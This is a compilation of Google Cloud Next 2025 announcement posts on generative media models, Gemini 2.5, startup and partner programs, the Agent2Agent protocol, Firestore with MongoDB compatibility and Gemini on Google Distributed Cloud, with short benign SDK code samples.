Create a cohesive video by connecting two existing assets (interpolation): With interpolation, you can define the beginning and end of a video sequence, allowing Veo to seamlessly generate the connecting frames. This ensures smooth transitions and maintains visual continuity, creating a polished and professional final product.
Interpolation creates smooth transitions across frames
Chirp 3: Instant Custom Voice and Transcription updates
Last month, we integrated Chirp 3, our groundbreaking audio understanding and generation model, into Vertex AI. Chirp 3’s new HD voices feature offers natural and realistic speech in over 35 languages with eight speaker options.
Now, we’re announcing two new features:
Chirp 3: Instant Custom Voice is now generally available through an allowlist. Now, you can generate realistic custom voices from 10 seconds of audio input. This enables enterprises to personalize call centers, develop accessible content, and establish unique brand voices—all while maintaining a consistent brand identity. To ensure responsible use, Instant Custom Voice includes built-in safety features, and our allowlisting process involves rigorous diligence to verify proper voice usage permissions.
Chirp 3: Transcription with Diarization is now available in preview with allowlist. This powerful feature accurately separates and identifies individual speakers in multi-speaker recordings, significantly improving the clarity and usability of transcriptions for applications like meeting summaries, podcast analysis, and multi-party call recordings.
Imagen 3: Improvements to Imagen quality and editing
Over the last year we’ve made huge improvements to Imagen 3, our highest quality text-to-image model, capable of generating images with even better detail, richer lighting and fewer distracting artifacts than our previous models.
Imagen 3 Editing provides a powerful and user-friendly way to refine and tailor any image. We’ve made significant improvements to Imagen 3 inpainting capabilities for reconstructing missing or damaged portions of an image. Our latest update significantly elevates the quality of object removal, delivering a more natural and seamless editing experience. Here is an example of how you can quickly remove unwanted objects, blemishes, or distractions from your photos.
Easy ways to tailor images, including removing unwanted objects
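For developers, basic generation is only a few lines with the google-genai Python SDK; a hedged sketch follows, where the project settings and the Imagen model identifier are placeholders, so check Vertex AI Model Garden for the current version.

```python
# Sketch using the google-genai SDK; project, location, and model ID are placeholders.
from google import genai

client = genai.Client(vertexai=True, project="my-project", location="us-central1")

result = client.models.generate_images(
    model="imagen-3.0-generate-002",  # placeholder: use the current Imagen 3 model ID
    prompt="A product photo of a ceramic mug on a sunlit wooden table",
)

# Save the first generated image to disk.
result.generated_images[0].image.save("mug.png")
```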
Build with enterprise safety and security
Designing and developing AI to be secure, safe, and responsible is paramount. Consistent with our AI Principles, Lyria, Veo 2, Chirp 3, and Imagen 3 on Vertex AI were built with safety at the core.
Digital watermarking: Google DeepMind’s SynthID embeds invisible watermarks into every image, video and audio frame that Imagen, Veo, and Lyria produce, helping decrease misinformation and misattribution concerns.
Safety filters: Veo, Imagen, Lyria, and Chirp all have built-in safeguards to help protect against the creation of harmful content and adhere to Google’s Responsible AI Principles. We will continue investing in new techniques to improve the safety and privacy protections of our models.
Data governance: We do not use customer data to train our models, in accordance with Google Cloud’s built-in data governance and privacy controls. Your customer data is only processed according to your instructions.
Copyright indemnity: Our indemnity for covered generative AI services offers peace of mind for copyright concerns.
Customers are delivering value with generative media models on Vertex AI
Generative AI is no longer a futuristic concept, but a powerful tool driving real-world business results. Companies like WPP, Agoda, Bending Spoons, Monks.Flow, The Brandtech Group, and Bloomberg Connects are using our generative media models in production. Let’s look at some concrete examples of how leading enterprises are leveraging Google Cloud’s generative media capabilities:
Goodby, Silverstein & Partners: In 1937, Salvador Dalí imagined “Giraffes on Horseback Salad” — a cinematic vision so surreal, so ahead of its time, that it proved impossible to produce. For almost a century, it lived only in sketches and notes. Now, with the power of Veo 2, Goodby Silverstein & Partners and The Dalí Museum have realized that vision — using tools finally capable of transforming surrealism into film.
“Dalí imagined a film so surreal, so untethered from convention, that it couldn’t exist in his lifetime. Now, thanks to the astonishing capabilities of Veo 2 and Imagen 3, we’ve been able to help bring that vision to life—not as a replica, but as a reawakening. It’s one of the most creatively thrilling things we’ve ever done.” – Jeff Goodby, Co-Chairman, Goodby Silverstein & Partners
Giraffes on Horseback Salad, Inspired by Salvador Dalí’s Screenplay
L’Oreal Groupe:
L’Oreal Groupe is leveraging Veo and Imagen to transform the end-to-end production of high-quality video and image assets, helping foster greater creative exploration across their global marketing initiatives and upholding their commitment to trustworthy AI.
“By integrating Veo and Imagen into our creative process, we’re not just speeding up marketing content creation, we’re changing how we approach creativity. These models act as powerful creative partners, empowering our teams to experiment with new ideas and respond to the market. We’re expanding our qualitative video and image production across 20 additional countries and languages, all while upholding our trustworthy AI values.” – Thomas Ménard, Manager of AI Center Enablement, L’Oreal Groupe
Kraft Heinz:
Kraft Heinz’s Tastemaker platform empowers their teams with access to Veo 2 and Imagen 3, dramatically accelerating creative and campaign development processes.
“With Veo 2 on Vertex AI as part of our Tastemaker platform, Kraft Heinz has unlocked unprecedented speed and efficiency in our creative workflows. What once took us eight weeks is now only taking eight hours, resulting in substantial cost savings. Implementing Google Cloud AI within our platform that is deeply trained on our brand intelligence, allows innovation and creative teams to rapidly prototype, test, and deploy content, transforming how we bring our iconic brands to life.” – Justin Thomas, Head Digital Experience & Growth
By leveraging our cutting-edge AI models on Vertex AI, enterprises are achieving remarkable gains in efficiency, creativity, and customer engagement. This momentum is a testament to the power of our technology and its ability to help drive tangible business value.
Get started
Get started with Veo, Imagen, and Chirp on Vertex AI today. To get started with Lyria, reach out to your Google Cloud account representative.
AI research labs and model builders like Anthropic, Cohere, Magic, Mistral, and AI21 Labs are great examples of AI startups building on Google Cloud. Anthropic has been using Google Cloud infrastructure to support model training and inference for several years. Google Cloud has also become an increasingly important route for organizations to access Anthropic’s models. In fact, more than 4,000 companies have started using Claude models via Vertex AI thus far.
This week at Google Cloud Next, we’re highlighting the progress that even more global startups are making toward building AI systems and applications that will create real value for people and businesses. We’ll share some of the new startups who have chosen Google Cloud as their key technology partner; new industry partnerships and resources to make it easier for early-stage startups to build and go to market on Google Cloud; new companies joining our global Accelerator programs; and more ways that startups are achieving success with Google Cloud.
Supporting more AI startups on Google Cloud
This week, we’re announcing an exciting group of startups who are launching new or expanded work with Google Cloud. These companies span a broad swath of use cases, products, and industries, including consumer apps used by millions of people, enterprise use cases like search and data analytics and storage, developer coding assistance, and solutions for unique vertical challenges. These include:
Augment Code is running its AI coding assistant, which specializes in helping developers navigate and contribute to production-grade codebases, on Google Cloud and is using Anthropic’s Claude models through Vertex AI.
Autoscience, a startup building AI agents to aid in scientific research, is using Google Cloud infrastructure and resources through our Startup Program as it begins to build and market its products.
Anysphere, the startup behind the AI-powered code editor Cursor, is now using Anthropic’s Claude models on Google Cloud to scale its AI coding assistant to more developers.
Big Sur AI now offers its AI-powered platform for retail and e-commerce customers on Google Cloud Marketplace.
Captions recently released its integration with Veo 2, making it easy for users to add B-roll content to the startup’s talking videos.
Eon.io, a startup focused on enterprise backup and recovery, has begun working with Google Cloud through our partnership with Lightspeed Capital; it’s now adding new AI search capabilities to its platform.
Features & Labels is a generative media platform for developers, accelerating the inference of gen AI models to improve the speed at which content is generated. The Fal team is working with Google Cloud to leverage its Veo 2 technology to help its users create videos with realistic motion and high-quality output.
Hebbia has integrated Gemini models into its Matrix platform, which helps organizations build AI agents capable of working across all of their data.
Magic, which is building frontier-scale models capable of understanding very large codebases, is growing its use of GPUs on Google Cloud as it accelerates research and model training.
Photoroom, a French startup that provides gen AI photo-editing and design capabilities to consumers and businesses, has used Veo 2 and Imagen 3 to improve the quality of its offering and accelerate its development.
Physical Intelligence recently partnered with Google Cloud to support model development, using our secure and scalable AI infrastructure.
Spot AI is a video AI startup that transforms passive security cameras into AI Agents for improving security, safety, and operations in industries like manufacturing, retail, hospitals, construction and more. They’re using Google Cloud to power their new interface for building custom video AI agents, called Iris.
Story is working with Google Cloud’s web3 services and infrastructure to bring new capabilities to developers on its platform.
Studyhall AI, which graduated from our UK Growth Accelerator program, has built a mobile application that uses Gemini models to help coach students on reading, writing, and exam prep.
Safe Superintelligence is partnering with Google Cloud to use TPUs to accelerate its research and development efforts toward building a safe, superintelligent AI.
Synthesia, a startup that operates an AI video platform, is using Google Cloud to build the next generation of advanced AI models that replicate realistic human likenesses and voice; the startup is also using Gemini models to handle complex vision and language-based tasks with speed and accuracy.
Ubie, a healthcare-focused startup founded in Japan, is using Gemini models via Google Cloud to power its physician assistance tool.
Udio is using TPUs to help train its models for music generation and serve its rapidly growing customer base.
Ufonia helps physicians deliver care by using AI to automate clinical consultations with patients. It is using Google Cloud’s full AI stack to power its platform, including infrastructure, models on Vertex AI Model Garden, BigQuery, and GKE.
Wagestream, a financial services startup, is using Gemini models to handle more than 80% of its internal customer inquiries, including questions about pay dates, balances, and more.
Wondercraft, an AI-powered content studio that helps users create engaging audio ads, podcasts and more, is leveraging Gemini models for some of its core functionalities and will soon release a Veo 2 integration.
New partnerships with accelerators and VCs
We’re also expanding our work with leading venture capital firms and accelerators, building on our existing relationships with firms like Sequoia and Y Combinator. These partnerships help provide technology like TPUs and Gemini models to fast-growing startups that are building with AI.
Today, we’re announcing a significant new partnership with the leading venture capital firm Lightspeed, which will make it easier for Lightspeed-backed startups to access technology and resources through the Google for Startups Cloud Program.
This includes upwards of $150,000 in cloud credits for Lightspeed’s AI portfolio companies, on top of existing credits available to all qualified startups through the Google for Startups Cloud Program. These credits help ensure participating startups will have more reliable access to cloud infrastructure and AI technology as they scale.
Lightspeed portfolio companies have already been using Google Cloud infrastructure, AI, and data tools, including Augment, Contextual, Grafana, and Mistral.
New resources to help startups build and go to market more quickly
Today we’re announcing new resources through the Google for Startups Cloud Program that will help startups access our infrastructure and technology more quickly.
We are also announcing our Startup Perks program, which provides early-stage startups with preferred access to solutions from our partners like Datadog, Elastic, ElevenLabs, GitLab, MongoDB, NVIDIA, Weights & Biases, and more. Exclusive discounts and benefits will be added on a regular basis, helping startups build and grow with the best of the Google Cloud ecosystem.
Additionally, Google for Startups Cloud Program members will receive an additional $10,000 in credits to use exclusively on Partner Models through Vertex AI Model Garden, so they can quickly start using both Gemini models and models from partners like Anthropic and Meta.
We’re proud that 97% of companies who join our Google for Startups Cloud Program choose to stay with Google Cloud after their program credits expire, underscoring the value that our products are providing.
New accelerator cohort companies
Google Cloud currently offers a series of Accelerator programs for startups around the world. Today, we’re announcing the Spring 2025 cohort of the Google for Startups Cloud AI Accelerator for startups based in North America.
Future of AI: Perspectives for Startups
This year, we also launched our first-ever “Future of AI: Perspectives for Startups 2025” report. To gain a deeper understanding of where AI is headed, we gathered perspectives from 23 industry leaders and investors on their expectations for AI and what it means for startups in 2025 and beyond.
These experts weighed in on topics like the role of AI agents, the future of AI infrastructure, the areas startup investors are prioritizing, and much more. I encourage anyone involved in or interested in the AI startup world to take a look.
It’s this kind of fresh thinking and new technology that’s making Google Cloud a home for the startup community, and AI startups in particular — and we see Next ‘25 as an important extension of this growing ecosystem. With more than 60% of gen AI startups building on our platform today, we want to be a key partner for their innovation. This commitment to startups is ongoing, and will continue to grow with new resources, accelerators, and other programs that help them build and scale their businesses. Please be sure to visit the Startup Hub on the Mandalay Bay Expo Floor at Next ‘25 to learn more.
Since the beginning, partners have been core to Google Cloud — and that’s been especially true in the AI era. I’m amazed at the ways they have helped bring both Google’s AI innovations and their own incredible AI products and services to customers. Partners have already built more than 1,000 AI agent use cases for customers across nearly every industry.
The AI opportunity for Google Cloud partners is growing fast. For example, a new study from IDC1 found that global systems integrators will grow their Google Cloud AI practices as much as 100% this year — and almost half of their Google Cloud AI projects have already moved into widespread production thanks to initial ROI that customers are seeing. It’s clear that much of the opportunity ahead lies in agentic AI — and now, partners are infused at every layer of our AI agent stack.
This week at Google Cloud Next, we’re announcing updates that will help our partners build AI agents, power them with enterprise data and a choice of models, and bring them to customers, including through a new AI Agent Marketplace. We’re also launching a new open protocol, with support from more than 50 of the industry’s leading enterprise technology companies, which will allow AI agents to securely communicate in order to successfully complete tasks. And we’re enhancing the ways we go to market together, offering new incentives and resources for co-selling and training, as well as new AI offerings in Workspace for resellers.
We’re committed to helping all of our partners capitalize on the AI opportunity, whether they’re building new technology, integrating with our products, or delivering critical enterprise services.
Integrating our partners at every layer of the agentic AI stack
We’ve always taken an open approach to AI, and the same is true for agentic AI. With updates this week at Next ‘25, we’re now infusing partners at every layer of our agentic AI stack to enable multi-agent ecosystems. Here’s a closer look:
Agent2Agent (A2A) protocol: Today, we’re launching a new open protocol, with support and contributions from our partners, that will allow AI agents to communicate with each other, securely exchange information, and coordinate actions across enterprise platforms and services like Atlassian, Box, Cohere, Intuit, Langchain, MongoDB, PayPal, Salesforce, SAP, ServiceNow, UKG and Workday. We believe the A2A framework will add significant value for customers, whose AI agents will now be able to work across their entire enterprise application estates; a sketch of what an A2A exchange looks like follows this list. More partners can begin building with the A2A framework today and can learn more in our technical blog here.
AI Agent Marketplace: We’re also launching a new AI Agent Marketplace — a dedicated section within Google Cloud Marketplace that will easily allow customers to browse, purchase, and manage AI agents built by our partners. Today, partners like Accenture, BigCommerce, Deloitte, Elastic, UiPath, Typeface, and VMware are offering agents through our AI Agent Marketplace, with additional agents launching soon from partners like Cognizant, Slalom, and Wipro.
Power agents with all your enterprise data: Data and AI models underpin all AI agents, and our open platform and agentic AI tooling make it possible for customers to train and fine-tune agents on their entire data estates. Today, we partner with companies like NetApp, Oracle, SAP, Salesforce, and ServiceNow — meaning customers with data stored in these popular platforms can now put this data to work to improve their AI agents.
Expert AI services: Our ecosystem of services partners — including Accenture, BCG, Capgemini, Cognizant, Deloitte, HCLTech, Infosys, KPMG, McKinsey, PwC, TCS, and Wipro — have actively contributed to the A2A protocol and will support its implementation. They’ve also significantly expanded their Google Cloud practices with new experts and technical resources over the past year. This means our customers now have access to a global community of highly-trained AI experts who can help them develop AI agent use cases and strategies with interoperability in mind; prototype new applications; train and manage AI models; and ultimately deploy AI agents across their businesses.
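For developers who want to see the protocol’s shape, here is a hedged sketch of a basic A2A exchange in Python: fetch a remote agent’s public Agent Card, then send it a task over JSON-RPC. The endpoint path, method name, and message fields follow the initial draft specification and are illustrative; see the technical blog linked above for the authoritative details.

```python
# Illustrative only: field and method names follow the draft A2A spec and may evolve.
import requests

REMOTE_AGENT = "https://agent.example.com"  # hypothetical A2A-enabled agent

# 1. Discover the agent via its public Agent Card.
card = requests.get(f"{REMOTE_AGENT}/.well-known/agent.json").json()
print("Discovered:", card["name"])

# 2. Send it a task as a JSON-RPC request.
task_request = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tasks/send",
    "params": {
        "id": "task-123",
        "message": {
            "role": "user",
            "parts": [{"type": "text", "text": "Check inventory for SKU 42"}],
        },
    },
}
response = requests.post(card["url"], json=task_request).json()
print("Task result:", response.get("result"))
```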
Simplifying the ways we help partners go to market
Across the board, for all types of partners, Google Cloud is increasing resources to help them address customer demand for AI and cloud implementation services — and to better help partners identify the largest, most strategic opportunities to grow their businesses. This includes a 2x increase in funding for AI opportunities over the past year alone, and builds on our existing nine-figure investment in partner learning over the past four years.
In addition, we are continuing to refine the way we go to market with partners, to ensure partners have access to the right opportunities, and customers have access to the best possible technology and expertise. This includes:
Better field alignment and co-sell: Google Cloud has been co-selling with partners since our inception. Now, we’re introducing new processes to better capture and share partners’ critical contributions with our sales team. This includes increased visibility into highly valuable co-selling activities like workshops, assessments, and proofs-of-concept, as well as partner-delivered services for migrations, application modernization, and other managed services. Ultimately, this information will better enable our sales team to connect customers with the right ISV and services partners.
More partner earnings: We are continuing to evolve our incentives that help partners capitalize on the biggest opportunities, such as a 2x increase in partner funding for AI opportunities over the past year. We’re also introducing new AI-powered capabilities in Earnings Hub, our destination for tracking incentives and growth, which will enable partners to benchmark performance against peers, receive personalized tips on how to boost earnings, and more.
Supporting partner readiness: In the past four years, we’ve invested more than $100 million in partner training, and we are continuing to expand these efforts to help our ecosystem develop expertise in critical areas like Google Agentspace, Workspace, and more.
Making Google Workspace the best AI productivity platform for partners
More than 3 billion users and over 11 million paying customers rely on Google Workspace. Now, new enterprise-grade AI capabilities with Gemini are helping users get work done more quickly in tools like Gmail, Meet, Docs, and more. Our partners play a critical role in helping organizations around the world deploy Workspace, including providing critical migration support and training for organizations big and small around the world.
This week at Next, we’re announcing new AI innovations in Workspace, including proactive analysis and visualization capabilities in Sheets, audio generation in Docs, a new way to automate work with AI agents in the loop, and more—all of which will make Workspace an even more attractive platform for customers and ensure partners are going to market with category-defining products. In addition, we’ve increased partner funding for Workspace opportunities by 4x over the past year, to ensure partners have the right resources and incentives to bring Workspace to customers.
With simplified pricing, an enhanced Gemini-powered feature set, and the ability to integrate Workspace with customers’ existing tools like Slack, we’re creating new and exciting opportunities for partners to create long-term, strategic engagements by implementing Workspace for customers.
Announcing 2025 partner awards winners
In closing, we’re honored to spotlight this year’s winners of Google Cloud’s partner awards, which recognize the innovation and value that partners have created for customers—particularly with AI. Our ecosystem continues to evolve to meet the needs of businesses across industries, and we’re proud of the ways they have deployed Google Cloud’s technology to address complex challenges faced by our customers. To learn more about this year’s winners, please read the complete list.
I’m excited to meet with thousands of partners this week and share ideas for how we can work together to support customers, and how we can provide a simple, effective go-to-market motion with our ecosystem. See you at Next ‘25!
1. IDC InfoBrief, sponsored by Google Cloud, Google Cloud AI: Driving Opportunity and Growth for Global Consulting & Systems Integrator Partners, doc #US53276025, April 2025
We recently announced Gemini 2.5, our most intelligent AI model yet. Gemini 2.5 models are now thinking models, capable of reasoning before responding, resulting in dramatically improved performance. This transparent step-by-step reasoning is crucial for enterprise trust and compliance.
Our first model in this family, Gemini 2.5 Pro, available in public preview on Vertex AI, is now among the world’s best models for coding and tasks requiring advanced reasoning. It has state-of-the-art performance on a wide range of benchmarks, is recognized by many users as the most enterprise-ready reasoning model, and tops the LMArena leaderboard by a significant margin.
Building on this momentum, we are launching Gemini 2.5 Flash, our workhorse model optimized for low latency and cost efficiency, on Vertex AI (our comprehensive platform for building and managing AI applications and agents) and in Google AI Studio.
Let’s dive into how these capabilities are transforming AI development on Google Cloud.
Advancing enterprise problem-solving with deep reasoning
Enterprises face challenges that span intricate information landscapes, demand multi-step analysis, and require nuanced decisions – tasks that demand an AI that doesn’t just process, but reasons. For these situations, we offer Gemini 2.5 Pro on Vertex AI, engineered for maximum quality and for tackling the most complex tasks that demand deep reasoning and coding expertise. Coupled with a one-million-token context window, Gemini 2.5 Pro performs deep data analysis, extracts key insights from dense documents like legal contracts or medical records, and handles complex coding tasks by comprehending entire codebases.
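In practice, a long-context analysis like this is a single call with the google-genai SDK; in the sketch below, the project settings, preview model ID, and document path are placeholders.

```python
# Placeholders: project, location, model ID, and the local document path.
from google import genai

client = genai.Client(vertexai=True, project="my-project", location="us-central1")

with open("contract.txt") as f:
    contract_text = f.read()  # a dense document, well within the one-million-token window

response = client.models.generate_content(
    model="gemini-2.5-pro-preview-03-25",  # placeholder preview model ID
    contents=[contract_text, "List the termination clauses and any associated penalties."],
)
print(response.text)
```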
“At Box, we’re redefining how enterprises apply intelligence to their content. With Box AI extract agents, powered by Gemini, users can instantly streamline tasks by making unstructured data actionable, as seen in millions of extractions supporting a variety of use cases, including procurement and reporting. Gemini 2.5 represents a leap forward in advanced reasoning, enabling us to envision building more powerful agent systems where extracted insights automatically trigger downstream actions and coordinate across multiple steps. This evolution pushes the boundaries of automation, allowing businesses to unlock and act upon their most valuable information with even greater impact and efficiency.” — Yashodha Bhavnani, VP of AI Product Management, Box
“Moody’s leverages Gemini’s advanced reasoning capabilities on Vertex AI within a model-agnostic framework. Our current production system uses Gemini 2.0 Flash for intelligent filtering and Gemini 1.5 Pro for high-precision extraction, achieving over 95% accuracy and an 80% reduction in processing time for complex PDFs. Building on this success, we are now in the early stages of testing Gemini 2.5 Pro. Its potential for deeper, structured reasoning across extensive document sets, thanks to features like its large context window, looks very promising for tackling even more complex data challenges and enhancing our data coverage further. While it’s not in production, the initial results are very encouraging.” — Wade Moss, Sr. Director, AI Data Solutions, Moody’s
To tailor Gemini for specific needs, businesses can soon leverage Vertex AI features like supervised tuning (for unique data specialization) and context caching (for efficient long context processing), enhancing performance and reducing costs. Both these features are launching in the coming weeks for Gemini 2.5 models.
Building responsive and efficient AI applications at scale
While Gemini 2.5 Pro targets peak quality for complex challenges, many enterprise applications prioritize speed, low latency, and cost-efficiency. To meet this need, we will soon offer Gemini 2.5 Flash on Vertex AI. This workhorse model is optimized specifically for low latency and reduced cost, delivering impressive and well-balanced quality for high-volume scenarios like customer service or real-time information processing. It’s the ideal engine for responsive virtual assistants and real-time summarization tools where efficiency at scale is key.
Gemini 2.5 Flash will also feature dynamic and controllable reasoning. The model automatically adjusts processing time (‘thinking budget’) based on query complexity, enabling faster answers for simple requests. You also gain granular control over this budget, allowing explicit tuning of the speed, accuracy, and cost balance for your specific needs. This flexibility is key to optimizing Flash performance in high-volume, cost-sensitive applications.
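As a sketch of that control, the google-genai SDK exposes a thinking budget on the generation config; the parameter and model names below reflect the SDK at the time of writing and may change. Setting the budget to zero asks the model to skip extended reasoning for simple, latency-sensitive requests.

```python
# Placeholder model ID; thinking_budget follows the google-genai SDK's naming.
from google import genai
from google.genai import types

client = genai.Client(vertexai=True, project="my-project", location="us-central1")

response = client.models.generate_content(
    model="gemini-2.5-flash-preview-04-17",  # placeholder preview model ID
    contents="Summarize this support ticket in one sentence: customer reports a login loop on iOS.",
    config=types.GenerateContentConfig(
        thinking_config=types.ThinkingConfig(thinking_budget=0)  # cap reasoning for speed and cost
    ),
)
print(response.text)
```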
“Gemini 2.5 Flash’s enhanced reasoning ability, including its insightful responses, holds immense potential for Palo Alto Networks, including detection of future AI-powered threats and more effective customer support across our AI portfolio. We are focused on evaluating the latest model’s impact on AI-assistant performance, including its summaries and responses, with the intention of migrating to this model to unlock its advanced capabilities.” — Rajesh Bhagwat, VP of Engineering, Palo Alto Networks
Optimizing your experience on Vertex AI
Choosing between powerful models like Gemini 2.5 Pro and 2.5 Flash depends on your specific needs. To make the choice easier, we’re introducing Vertex AI Model Optimizer, an experimental capability that automatically generates the highest-quality response for each prompt based on your desired balance of quality and cost. For customers whose workloads do not require processing in a specific location, our Vertex AI Global Endpoint provides capacity-aware routing for our Gemini models across multiple regions, maintaining application responsiveness even during peak traffic or regional service fluctuations.
Powering the future with sophisticated agents and multi-agent ecosystems
Gemini 2.5 Pro’s advanced multimodal reasoning enables sophisticated, real-world agent workflows. It interprets visual context (maps, flowcharts), integrates text understanding, performs grounded actions like web searches, and synthesizes diverse information – allowing agents to interact meaningfully with complex inputs.
Building on this potential, today we are also announcing a number of innovations in Vertex AI to enable multi-agent ecosystems. One key innovation supporting dynamic, real-time interactions is the Live API for Gemini models. This API allows agents to process streaming audio, video, and text with low latency, enabling human-like conversations, participation in live meetings, or monitoring real-time situations (such as understanding spoken instructions mid-task).
Key Live API features further enhance these interactions: support for long, resumable sessions (greater than 30 minutes), multilingual audio output, time-stamped transcripts for analysis, dynamic instruction updates within sessions, and powerful tool integrations (search, code execution, function calling). These advancements pave the way for leveraging models like Gemini 2.5 Pro in highly interactive applications.
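A rough sketch of a Live API session via the google-genai SDK appears below; the model identifier is a placeholder, the message fields are assumptions drawn from the SDK's live interface, and production code would stream real microphone audio rather than a single text turn.

import asyncio
from google import genai
from google.genai import types

client = genai.Client(vertexai=True, project="my-project", location="us-central1")

async def main():
    # Open a low-latency, bidirectional streaming session (model name assumed).
    config = types.LiveConnectConfig(response_modalities=["AUDIO"])
    async with client.aio.live.connect(model="gemini-live-model", config=config) as session:
        await session.send_client_content(
            turns=types.Content(
                role="user",
                parts=[types.Part.from_text(text="Talk me through replacing the filter.")],
            )
        )
        async for message in session.receive():
            if message.data:   # streamed audio bytes
                pass           # hand off to an audio player in a real app
            if message.text:   # optional transcript text
                print(message.text)

asyncio.run(main())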
Get started
Ready to tackle complex problems, build efficient applications, and create sophisticated AI agents? Try Gemini 2.5 on Vertex AI now!
Today at Google Cloud Next, we’re thrilled to announce Firestore with MongoDB compatibility, built from the ground up by Google Cloud. It provides developers with an additional choice for their demanding document database workloads.
MongoDB compatibility has been a highly requested capability from Firestore’s existing community of over 600,000 active developers. With this launch, Firestore developers can take advantage of MongoDB’s API portability along with Firestore’s differentiated serverless service, enjoying multi-region replication with strong consistency, virtually unlimited scalability, industry-leading availability backed by up to a 99.999% SLA, and single-digit-millisecond read performance.
Combined with the ability to use existing MongoDB application code, drivers, and tools, as well as the open-source ecosystem of MongoDB integrations, Firestore developers can quickly build applications for common use cases, including content management systems, e-commerce product catalogs, and user profiles.
Firestore with MongoDB compatibility also offers a customer-friendly serverless pricing model, with no up-front commitments required. Customers only pay for what they use without the hidden costs of capacity planning. You can learn more about how to get started at our Firestore with MongoDB compatibility site.
“After migrating to Firestore, we improved developer productivity by 55%, observed better service reliability, and have been able to seamlessly scale to over 250,000 requests per second and 30 billion documents. Because Firestore is completely serverless and provides virtually unlimited scalability, we no longer have to worry about managing our underlying database infrastructure — liberating us from database DevOps. This has enabled us to focus on product innovations that matter to our customers,” said Karan Agarwal, director of engineering, HighLevel.
Here’s how Firestore with MongoDB compatibility is different
Developers enjoy the agility of the popular MongoDB API and query language to store and query semi-structured JavaScript Object Notation (JSON) data. With this announcement, we’re implementing the MongoDB API natively in the existing Firestore service, allowing developers to use their MongoDB drivers and integrations to read and write to Firestore with no application code changes. Developers can now build their applications with the best of the MongoDB ecosystem while leveraging Google’s experience in designing and managing scalable, highly available serverless document database services.
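Because the MongoDB API is implemented natively, existing driver code should work unchanged. Here is a hedged sketch using PyMongo, where the connection URI is a placeholder: the real host, credentials, and options come from your Firestore database's connection details in the console.

from pymongo import MongoClient

# Placeholder URI: substitute the connection string the Firestore console
# generates for your Enterprise-edition database.
client = MongoClient("mongodb://USER:PASSWORD@HOST:443/?tls=true")
db = client["inventory"]

# Ordinary MongoDB driver calls, served by Firestore with no code changes.
db.products.insert_one({"sku": "A-100", "name": "Espresso machine", "stock": 12})
for doc in db.products.find({"stock": {"$gt": 0}}).limit(5):
    print(doc["name"], doc["stock"])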
Firestore utilizes disaggregated compute and storage layers that scale independently, in real-time. The Firestore compute layer implements multiple developer friendly APIs, including a Firestore with MongoDB compatibility API.
Benefits of Firestore with MongoDB compatibility:
1. Scale while maintaining performance, with zero intervention and downtime
At Firestore’s core is an intelligent, serverless document database service that serves some of the most demanding workloads in the world, powering more than 1.5 billion monthly active end-users. Firestore offers virtually unlimited horizontal scaling with zero customer intervention or downtime.
We’re able to do this through a differentiated backend that offers automatic, real-time rebalancing of disaggregated compute and storage, smoothing out load across nodes. It allows us to add resources exactly where they are needed. We’re now able to bring the best of Google Cloud to the document database ecosystem.
In this graph, Firestore is auto-scaling to handle a sudden database traffic spike of over 20,000 writes per second, while observing improved (lower) latency at scale.
2. Industry-leading availability
Firestore enables automatic, synchronous replication across different availability zones and regions. When any replica becomes unhealthy, Firestore will fail over to another replica with zero downtime and zero data loss. At the same time, it will apply automatic self-healing on the unhealthy replica. Unhealthy replicas will not affect processes such as automatic scaling.
Firestore handles regional and zonal failures with zero downtime and zero data loss, while applying automatic self-healing.
3. Simplified database fleet management
Firestore’s integration with Database Center simplifies database fleet management and is connected with Gemini Cloud Assist’s database improvement recommendations.
4. Transparent, simple pricing
Firestore makes keeping costs in check easier than ever. Pricing is transparent, predictable, and simple. For reads and writes, customers simply pay for the operations performed, metered by the size of the documents and index entries involved: in 4-kilobyte chunks for reads and 1-kilobyte chunks for writes.
There are no upfront fees or hidden costs from challenging cluster capacity planning, mismanaged cluster sharding, or I/O charges. Customers can reduce operation costs further with one-year and three-year committed-use discounts. Storage is billed for actual storage consumed, and is inclusive of automatic data replication. Customers can explore examples of applied pricing here.
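To make the chunked metering concrete, here is a small illustrative calculation based only on the chunk sizes described above; actual rates, minimums, and rounding rules are defined on the Firestore pricing page.

import math

# Reads meter document-plus-index size in 4 KiB chunks; writes in 1 KiB chunks.
def read_units(size_bytes: int) -> int:
    return max(1, math.ceil(size_bytes / (4 * 1024)))

def write_units(size_bytes: int) -> int:
    return max(1, math.ceil(size_bytes / 1024))

print(read_units(10 * 1024))   # a 10 KiB document bills 3 read units
print(write_units(10 * 1024))  # ... and 10 write units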
5. Maximize developer flexibility
Firestore offers developers more interface choices. Coming soon, we will also offer data interoperability between Firestore’s MongoDB-compatible interface and Firestore’s innovative real-time and offline SDKs. This allows developers to make the most of existing libraries and tools from both the MongoDB and Firestore developer communities.
Supercharge your applications with Firestore’s upcoming data interoperability, enabling you to utilize both MongoDB drivers and Firestore web & mobile SDKs on the same Firestore database.
Get started on Firestore with MongoDB compatibility
With this launch, Google Cloud is offering developers seeking a MongoDB interface multiple choices, including both MongoDB Atlas and Firestore. We’re thrilled to see what you’ll be able to achieve using Firestore with MongoDB compatibility. Firestore with MongoDB compatibility is available in preview as part of the new Firestore Enterprise edition. Get started today on Firestore with no upfront fees and a free tier.
Today we are announcing that Gemini will be available on Google Distributed Cloud (GDC), bringing Google’s most capable models to on-premises environments, with public preview starting in Q3 2025. To do so, we’ve partnered with NVIDIA to bring our Gemini models to NVIDIA Blackwell systems that you can purchase through Google or your preferred channels.
GDC is a fully managed on-prem and edge cloud solution that is offered in both connected and air-gapped options, scaling from a single server to hundreds of racks. It offers infrastructure-as-a-service, security, data, and AI services, and is extensible with a rich ISV ecosystem. GDC takes care of infrastructure management, making it easy for your developers to focus on leveraging the best that AI has to offer and build applications, assistants, and agents.
“NVIDIA and Google Distributed Cloud provide a secure AI platform, bringing Gemini models to enterprise datacenters and regulated industries. With NVIDIA Blackwell infrastructure and confidential computing, Google Distributed Cloud enhances privacy and security, and delivers industry-leading performance on DGX B200 and HGX B200 systems, available from Dell.” – Justin Boitano, VP, Enterprise AI Software, NVIDIA.
Historically, organizations facing strict regulatory, sovereignty, latency, or data-volume requirements have been unable to access the latest AI technology because they must keep their data on-premises. Their only options have been open-source models and tools, and in most cases they have had to assemble the software and hardware themselves, increasing operational burden and complexity. With Gemini on GDC, you don’t have to compromise between the best of AI and the need to keep your data on-premises.
Our GDC air-gapped product, which is now authorized for US Government Secret and Top Secret missions, and on which Gemini is available, provides the highest levels of security and compliance.
Gemini on GDC: unlocking generative AI anywhere
